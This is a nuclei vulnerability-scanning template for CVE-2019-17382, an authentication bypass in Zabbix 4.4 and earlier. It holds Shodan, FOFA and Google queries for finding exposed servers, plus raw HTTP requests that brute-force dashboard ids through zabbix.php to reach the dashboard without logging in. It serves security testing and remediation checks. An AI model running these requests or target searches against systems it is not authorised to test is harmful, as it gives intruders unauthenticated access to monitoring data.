Zabbix <=4.4 - Authentication Bypass

Reported by ProjectDiscovery on 03 Jul 2026 13:39:16. Type: nuclei template. Source: github.com

Zabbix <=4.4 - Authentication Bypass via zabbix.php

Code
id: CVE-2019-17382

info:
  name: Zabbix <=4.4 - Authentication Bypass
  author: harshbothra_
  severity: critical
  description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application.
  remediation: |
    Upgrade to a patched version of Zabbix (later than 4.4, since releases through 4.4 are affected) to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47467
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
    - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html
    - https://github.com/huimzjty/vulwiki
    - https://github.com/merlinepedra25/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-17382
    cwe-id: CWE-639
    epss-score: 0.5415
    epss-percentile: 0.98882
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 100
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve2019,cve,auth-bypass,login,edb,zabbix,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /
        - /zabbix.php
        - /zabbix/zabbix.php

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(body), "<title>warning [refreshed every", "zabbix-logo", "content=\"zabbix sia")'
        internal: true

  - raw:
      - |
        GET {{path}}?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /zabbix.php
        - /zabbix/zabbix.php
      ids: helpers/wordlists/numbers.txt
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>Dashboard</title>"

      - type: status
        status:
          - 200
# digest: 490a0046304402201eb451d8f4e41f17b355b819c4ad2b8dcff00e25e4097a233a1b4634333214cc02201cc19b4dc56aad751e43303a29f4c5e9885370f3369ebb24e84074b47963d22e:922c64590222798bb761d5b6d8e72950


Scores (current as of 04 Feb 2026 07:00): Vulners AI Score 7.2 (high risk), CVSS 2 6.4, CVSS 3.1 9.1, EPSS 0.5415